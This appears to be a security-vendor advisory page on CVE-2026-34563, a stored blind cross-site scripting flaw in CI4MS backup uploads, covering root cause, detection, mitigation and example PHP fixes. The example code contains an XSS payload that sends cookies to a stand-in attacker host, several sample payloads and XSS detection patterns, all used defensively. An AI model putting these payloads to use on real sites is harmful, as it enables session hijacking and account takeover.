
CVE-2026-34563: CI4MS CMS Stored XSS Vulnerability

CVE-2026-34563 is a stored blind XSS flaw in CI4MS, a CodeIgniter 4-based CMS, allowing attackers to inject malicious scripts via backup uploads. This article covers technical details, affected versions, and mitigation.

Published: April 2, 2026

CVE-2026-34563 Overview

CVE-2026-34563 is a critical stored cross-site scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton that provides a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application neither validates the metadata it extracts from uploaded backup files nor encodes that metadata when rendering it. An attacker who can upload a backup can craft an SQL file whose embedded filename contains a JavaScript payload; the backup-import routine writes that value to the database server-side, and several backup management views then print it into HTML without output encoding. Because the script fires only when some other user, typically an administrator, opens those views, the result is stored blind cross-site scripting (blind XSS).

Critical Impact

An attacker with a low-privileged account that can upload backups can plant a persistent script that executes in the browser of any administrator who views the backup management interface. Depending on what the script does, that can lead to session hijacking, privilege escalation (performing administrative actions with the victim's authenticated session), and unauthorized data access. Marking the session cookie HttpOnly stops the script from reading the cookie but not from issuing authenticated requests from the victim's browser, so it limits rather than removes the impact.

Affected Products

  • CI4MS versions prior to 0.31.0.0

Discovery Timeline

  • 2026-04-01 - CVE-2026-34563 published to NVD
  • 2026-04-02 - Last updated in NVD database

Technical Details for CVE-2026-34563

Vulnerability Analysis

The vulnerability stems from missing input validation and missing output encoding in the CI4MS backup management functionality. The application accepts user-uploaded backup files, including SQL files that carry backup metadata such as the backup's filename. When an attacker uploads a crafted SQL file whose filename field contains a JavaScript payload, the application stores that payload unchanged. When an administrator later opens the backup management views, the stored value is written directly into the page and the browser executes the attacker's script.

The attack is "blind" because the attacker does not see the payload execute: it runs later, in the browser of whichever administrator or other privileged user opens the backup management interface. The attacker therefore typically has the script exfiltrate data (cookies, page contents, CSRF tokens) to an external endpoint or perform actions on the victim's behalf, which makes this a reliable way to reach high-value accounts from a low-privileged one.

Root Cause

The root cause of CVE-2026-34563 is a failure to validate user-controlled data during backup file upload processing, combined with missing output encoding when backup metadata is rendered in administrative views. The application trusts the filename and other metadata it extracts from an uploaded SQL backup file, and later writes those values into HTML without escaping the characters that are significant in that context (<, >, ", ', &). Secure coding practice treats all user-supplied data as untrusted and encodes output according to the context in which it is rendered. Output encoding is the control that actually prevents XSS; input validation on the upload path is defense in depth, and the fix should include both.

Attack Vector

The attack is network-based and requires only low privileges. An attacker able to upload backup files to the CI4MS application crafts an SQL backup file (for example, xss.sql) with a JavaScript payload embedded in the filename or other metadata fields. When the application processes the file, the payload is stored in the database. It then executes whenever a user with access to the backup management views loads the affected pages; beyond opening the page, no interaction by the victim is needed.

In sequence: the attacker uploads a backup whose crafted filename contains script tags or a JavaScript event handler; the application's SQL processing routine extracts and stores that filename without sanitization; when the backup management interface renders the list of backups, it writes the filename into the HTML unencoded, and the browser interprets and executes the embedded JavaScript. For the vendor's details, see the GitHub Security Advisory GHSA-85m8-g393-jcxf.
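As an added illustration of the root cause and the mechanism above (example code written for this article, not taken from CI4MS or the advisory), the PHP snippet below contrasts the unsafe rendering pattern with an encoded version and adds an allow-list check for backup names. It runs stand-alone with the PHP CLI. The function names, the sample payload, the attacker host and the naming policy are all assumptions made for the example; htmlspecialchars() stands in for CodeIgniter 4's esc() view helper, which performs the same HTML-context encoding.

```php
<?php
// Added example for this article, not CI4MS code: unsafe vs encoded rendering of a
// stored backup filename, plus an allow-list check for names accepted at upload.
declare(strict_types=1);

// Constructed attacker-controlled filename of the kind the advisory describes
// (an img tag whose onerror handler exfiltrates cookies to an assumed host).
const SAMPLE_PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">.sql';

// Vulnerable pattern: the stored value is interpolated straight into HTML.
function renderRowUnsafe(string $filename): string
{
    return "<tr><td>{$filename}</td></tr>";
}

// Hardened pattern: encode for the HTML text context at the point of output.
// In a CodeIgniter 4 view the equivalent is the esc() helper: esc($filename).
function renderRowSafe(string $filename): string
{
    $encoded = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<tr><td>{$encoded}</td></tr>";
}

// Upload-side allow-list (assumed policy): a short token of safe characters
// ending in .sql, no path separators, no leading dot, no ".." sequences.
function isValidBackupName(string $filename): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.sql\z/', $filename) === 1
        && !str_contains($filename, '..');
}

echo "unsafe: " . renderRowUnsafe(SAMPLE_PAYLOAD) . "\n"; // a browser would run the onerror handler
echo "safe:   " . renderRowSafe(SAMPLE_PAYLOAD) . "\n";   // a browser shows literal text, nothing runs

foreach ([SAMPLE_PAYLOAD, 'site-2026-04-01.sql', 'dump.sql.php', '../etc.sql'] as $name) {
    printf("%-75s %s\n", $name, isValidBackupName($name) ? 'accepted' : 'rejected');
}
```

Apply the allow-list both to the uploaded file's name and to any filename or label parsed out of the SQL file's contents, since in this bug the stored value came from inside the backup rather than from the multipart filename. Encoding in the view remains mandatory even with validation in place, because backups imported before the check existed are already in the database.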

Detection Methods for CVE-2026-34563

Indicators of Compromise

  • Unexpected JavaScript or HTML tags present in backup file metadata or filenames stored in the database
  • Database entries containing <script>, onerror=, onload=, or other XSS payload patterns in backup-related tables
  • Unusual outbound network connections from administrative user browsers when viewing backup management pages
  • Reports of unexpected behavior or redirects when administrators access the backup management interface

Detection Strategies

  • Implement a Content Security Policy (CSP) with a strict script-src directive so that inline scripts and event handlers are blocked, and enable violation reporting so that a blocked payload still generates a signal
  • Deploy Web Application Firewall (WAF) rules that inspect the bodies of file-upload requests for XSS payloads; many WAF profiles do not inspect multipart file contents by default, and a payload carried inside an SQL file's metadata is exactly what such a profile misses
  • Monitor application logs for uploads whose filenames or extracted metadata contain patterns such as <script>, javascript:, or on*= event handler attributes
  • Conduct periodic audits of the backup metadata stored in the database, decoding URL- and HTML-entity-encoded values before matching, to find payloads stored before detection was in place
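The following PHP audit script is an added example for this article (not a CI4MS or SentinelOne tool) that implements the database-audit step above: it scans backup metadata rows for the injection patterns listed under Indicators of Compromise after undoing URL and HTML-entity encoding. SAMPLE_ROWS is constructed test data standing in for the result of a query against the application's backup table, whose real name and columns are not given on this page; auditRows, scanValue and normalise are names chosen for the example.

```php
<?php
// Added example for this article, not a CI4MS or SentinelOne tool: audit stored
// backup metadata for cross-site scripting payloads.
declare(strict_types=1);

// Constructed rows standing in for the result of a query such as
// SELECT id, filename, note FROM <backup table>; the real table and column
// names in CI4MS are not given on this page.
const SAMPLE_ROWS = [
    ['id' => 1, 'filename' => 'site-2026-03-28.sql', 'note' => 'nightly'],
    ['id' => 2, 'filename' => '<script src=//attacker.example/x.js></script>.sql', 'note' => ''],
    ['id' => 3, 'filename' => 'db.sql', 'note' => '<svg/onload=alert(document.domain)>'],
    ['id' => 4, 'filename' => 'x.sql', 'note' => '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E'],
    ['id' => 5, 'filename' => 'report-2026-03-30.sql', 'note' => 'pre-upgrade snapshot'],
];

// Pattern families to flag. Expect some false positives (a note containing
// "version=" trips the handler rule) and review hits by hand; a filename
// should never legitimately contain any of these.
const XSS_PATTERNS = [
    'tag'     => '/<\s*\/?\s*(script|img|svg|iframe|object|embed|math|video|audio|body|link|meta|style|details)\b/i',
    'handler' => '/\bon[a-z]+\s*=/i',
    'scheme'  => '/(javascript|vbscript|data)\s*:/i',
    'any_tag' => '/<[a-z!\/?]/i',
];

// Undo URL encoding and HTML entities so that encoded payloads are still matched.
function normalise(string $value): string
{
    return html_entity_decode(rawurldecode($value), ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Return the names of every pattern family that matches the decoded value.
function scanValue(string $value): array
{
    $hits = [];
    $decoded = normalise($value);
    foreach (XSS_PATTERNS as $name => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Scan the given columns of every row; return one finding per suspicious cell.
function auditRows(array $rows, array $columns = ['filename', 'note']): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach ($columns as $column) {
            $hits = scanValue((string) ($row[$column] ?? ''));
            if ($hits !== []) {
                $findings[] = ['id' => $row['id'], 'column' => $column, 'patterns' => $hits, 'value' => $row[$column]];
            }
        }
    }
    return $findings;
}

foreach (auditRows(SAMPLE_ROWS) as $finding) {
    printf("row %d %-8s [%s] %s\n", $finding['id'], $finding['column'],
        implode(',', $finding['patterns']), $finding['value']);
}
```

Point auditRows at the real query result instead of SAMPLE_ROWS. Rows 2, 3 and 4 of the sample data are flagged and row 1 and 5 are not; any hit on live data means the row should be removed or replaced, and every administrator who opened the backup list since that row was created should be treated as potentially compromised.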

Monitoring Recommendations

  • Enable CSP violation reporting (report-to or report-uri) and alert on reports originating from the backup management pages; a violation there is a strong signal that a stored payload tried to execute
  • Configure SIEM alerts on the backup upload endpoints for filenames or request bodies containing script-like content, and, where a reverse proxy or WAF logs response bodies, on unexpected script content in responses from the backup management pages
  • Monitor for anomalous session activity after an administrator visits the backup management interface (administrative actions from an unfamiliar IP address or user agent, one session used from two locations), which may indicate session hijacking

How to Mitigate CVE-2026-34563

Immediate Actions Required

  • Upgrade CI4MS to version 0.31.0.0 or later immediately to patch this vulnerability
  • Audit existing backup records in the database for stored XSS payloads and remove or sanitize any malicious entries; treat any administrator who viewed the backup interface while a payload was present as potentially compromised and invalidate their sessions
  • Implement Content Security Policy headers to mitigate the impact of any undetected stored XSS payloads
  • Review access logs to identify suspicious backup file uploads that may have exploited this vulnerability, and the accounts that performed them

Patch Information

The vulnerability has been patched in CI4MS version 0.31.0.0. Organizations running affected versions should upgrade immediately. The patch release is available at the GitHub Release 0.31.0.0. Detailed information about the security fix can be found in the GitHub Security Advisory GHSA-85m8-g393-jcxf.

Workarounds

  • Restrict backup upload functionality to a small set of highly trusted administrators until the patch is applied; the risk lies in who can upload, not in who can view
  • Implement a strict Content Security Policy with script-src 'self' (no 'unsafe-inline'); this blocks inline script tags and on*= handlers but does not remove the stored payload, may break legitimate inline scripts in the CMS, and must be tested before production use
  • Deploy a Web Application Firewall (WAF) configured to block requests containing common XSS payload patterns, including inside multipart file contents; treat this as a speed bump rather than a fix, because encoding and obfuscation bypasses are routine
  • Disable or restrict access to the backup management interface entirely until the upgrade is complete
```apache
# Example Content Security Policy header configuration for Apache (requires mod_headers)
# Add to .htaccess or the Apache virtual host configuration
# Use "Header always set ..." if the header should also be sent on error responses
# Test against the CMS first: a strict script-src breaks any inline scripts the admin UI relies on
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none'; form-action 'self';"
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Vulnerability Details

  • Type: XSS
  • Vendor/Tech: Ci4ms
  • Severity: CRITICAL
  • CVSS Score: 9.1
  • EPSS Probability: 0.05%
  • Known Exploited: No
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Impact Assessment (as encoded in the CVSS vector above)

  • Confidentiality: High
  • Integrity: Low
  • Availability: Low

CWE References

  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Technical References

  • GitHub Release 0.31.0.0
  • GitHub Security Advisory GHSA-85m8-g393-jcxf

Related CVEs

  • CVE-2026-39392: CI4MS CodeIgniter CMS XSS Vulnerability
  • CVE-2026-39391: CI4MS CodeIgniter CMS XSS Vulnerability
  • CVE-2026-34571: CI4MS Backend Stored XSS Vulnerability
  • CVE-2026-34567: CI4MS CodeIgniter CMS XSS Vulnerability
©2026 SentinelOne, All Rights Reserved.